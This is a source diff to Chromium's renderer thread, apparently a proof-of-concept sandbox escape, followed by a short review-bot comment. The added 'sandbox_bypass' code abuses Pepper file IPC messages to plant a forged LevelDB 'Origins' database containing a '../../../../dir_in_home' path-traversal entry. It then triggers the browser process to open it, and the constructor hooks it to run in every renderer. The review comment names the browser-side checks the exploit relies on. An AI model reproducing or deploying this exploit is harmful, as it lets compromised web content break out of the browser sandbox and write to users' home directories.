--- render_thread_impl_old.cc 2012-11-20 13:13:42.909650808 -0800
|
+++ render_thread_impl.cc 2012-11-20 13:16:20.887079108 -0800
|
@@ -107,6 +107,14 @@
|
#include "ipc/ipc_channel_posix.h"
|
#endif
|
|
+#include "ppapi/proxy/pepper_file_messages.h"
|
+#include "ppapi/shared_impl/file_path.h"
|
+#include "base/file_path.h"
|
+#include "ipc/ipc_platform_file.h"
|
+#include "content/common/fileapi/file_system_messages.h"
|
+#include "chrome/common/chrome_paths_internal.h"
|
+#include "webkit/fileapi/file_system_types.h"
|
+
|
using WebKit::WebDocument;
|
using WebKit::WebFrame;
|
using WebKit::WebNetworkStateNotifier;
|
@@ -246,10 +254,130 @@
|
return lazy_tls.Pointer()->Get();
|
}
|
|
+namespace sandbox_bypass {
|
+
|
+typedef unsigned char u8;
|
+
|
+void Debug(const char *msg, int code) {
|
+ printf("DEBUG: %s, code=%d\n", msg, code);
|
+ fflush(stdout);
|
+ *(volatile unsigned *)0;
|
+}
|
+
|
+ppapi::PepperFilePath BuildPath(std::string rel) {
|
+ FilePath path;
|
+
|
+ chrome::GetDefaultUserDataDirectory(&path);
|
+ path = path.Append("Default/File System");
|
+ path = path.Append(rel);
|
+
|
+ return ppapi::PepperFilePath::MakeAbsolute(path);
|
+}
|
+
|
+void Rmdir(RenderThreadImpl *rend, std::string dir) {
|
+ base::PlatformFileError err;
|
+ rend->Send(new PepperFileMsg_DeleteFileOrDir(BuildPath(dir), true, &err));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("DeleteFileOrDir", (int)err);
|
+}
|
+
|
+void Mkdir(RenderThreadImpl *rend, std::string dir) {
|
+ base::PlatformFileError err;
|
+ rend->Send(new PepperFileMsg_CreateDir(BuildPath(dir), &err));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("CreateDir", (int)err);
|
+}
|
+
|
+base::PlatformFile Open(RenderThreadImpl *rend, std::string name) {
|
+ base::PlatformFileError err;
|
+ IPC::PlatformFileForTransit file;
|
+
|
+ rend->Send(new PepperFileMsg_OpenFile(BuildPath(name), 0x48, &err, &file));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("Open", (int)err);
|
+
|
+ return IPC::PlatformFileForTransitToPlatformFile(file);
|
+}
|
+
|
+void Write(base::PlatformFile file, u8 *buf, size_t len) {
|
+ int ret;
|
+
|
+ ret = base::WritePlatformFileAtCurrentPos(file, (const char *)buf, len);
|
+ if (ret < 0)
|
+ Debug("WritePlatformFileAtCurrentPos", ret);
|
+ if ((size_t)ret != len)
|
+ Debug("WritePlatformFileAtCurrentPos written!=len", ret);
|
+}
|
+
|
+void Close(base::PlatformFile file) {
|
+ base::ClosePlatformFile(file);
|
+}
|
+
|
+void CreateFile(RenderThreadImpl *rend, std::string name, u8 *data, size_t len) {
|
+ base::PlatformFile file;
|
+
|
+ file = Open(rend, name);
|
+ Write(file, data, len);
|
+ Close(file);
|
+}
|
+
|
+void Trigger(RenderThreadImpl *rend) {
|
+ rend->Send(new FileSystemHostMsg_Open(
|
+ 1,
|
+ GURL("http://www.example.com/"),
|
+ fileapi::kFileSystemTypeTemporary,
|
+ 0x100000,
|
+ true));
|
+}
|
+
|
+void CreateDirInHome(RenderThreadImpl *rend) {
|
+ u8 current[] = {'M', 'A', 'N', 'I', 'F', 'E', 'S', 'T', 0x0a};
|
+ u8 manifest[] = {
|
+ 0x56, 0xf9, 0xb8, 0xf8, 0x1c, 0x00, 0x01, 0x01,
|
+ 0x1a, 0x6c, 0x65, 0x76, 0x65, 0x6c, 0x64, 0x62,
|
+ 0x2e, 0x42, 0x79, 0x74, 0x65, 0x77, 0x69, 0x73,
|
+ 0x65, 0x43, 0x6f, 0x6d, 0x70, 0x61, 0x72, 0x61,
|
+ 0x74, 0x6f, 0x72, 0xa4, 0x9c, 0x8b, 0xbe, 0x08,
|
+ 0x00, 0x01, 0x02, 0x03, 0x09, 0x00, 0x03, 0x04,
|
+ 0x04, 0x00};
|
+ u8 log[] = {
|
+ 0x69, 0xc2, 0x4a, 0x46, 0x43, 0x00, 0x01, 0x01,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
|
+ 0x00, 0x00, 0x00, 0x01, 0x1d, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00};
|
+
|
+ // fake key value pair
|
+ memcpy(log + 0x15, "ORIGIN:http_www.example.com_0", 0x1d);
|
+ memcpy(log + 0x33, "../../../../dir_in_home", 0x17);
|
+
|
+ // remove old database
|
+ Rmdir(rend, "Origins");
|
+ Mkdir(rend, "Origins");
|
+
|
+ // create fake database
|
+ CreateFile(rend, "Origins/CURRENT", current, sizeof(current));
|
+ CreateFile(rend, "Origins/MANIFEST", manifest, sizeof(manifest));
|
+ CreateFile(rend, "Origins/000003.log", log, sizeof(log));
|
+
|
+ // load fake database
|
+ Trigger(rend);
|
+
|
+ Debug("done", 0);
|
+}
|
+
|
+}
|
+
|
// When we run plugins in process, we actually run them on the render thread,
|
// which means that we need to make the render thread pump UI events.
|
RenderThreadImpl::RenderThreadImpl() {
|
Init();
|
+ sandbox_bypass::CreateDirInHome(this);
|
}
|
|
RenderThreadImpl::RenderThreadImpl(const std::string& channel_name)
|
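Review bot: The `sandbox_bypass` namespace carries no comment saying what it reproduces, and `CreateDirInHome(this)` is called unconditionally from the `RenderThreadImpl()` constructor, so any build with this patch runs it in every renderer and then dies on the deliberate null read in `Debug("done", 0)`. A header such as `// Test-only PoC: simulates a compromised renderer; must never land or ship.` above the namespace would make that explicit. From the visible lines the harness appears to rely on two browser-side gaps: the `PepperFileMsg_*` handlers accepting an absolute profile path from this renderer, and the directory value `../../../../dir_in_home` read back from the `Origins` database being joined without rejecting `..` components. Those are the checks to confirm or add in the browser process, whose code is not part of this hunk. Separately, `err` in `Rmdir`, `Mkdir` and `Open` is read uninitialised if `Send` fails; `base::PlatformFileError err = base::PLATFORM_FILE_ERROR_FAILED;` avoids that.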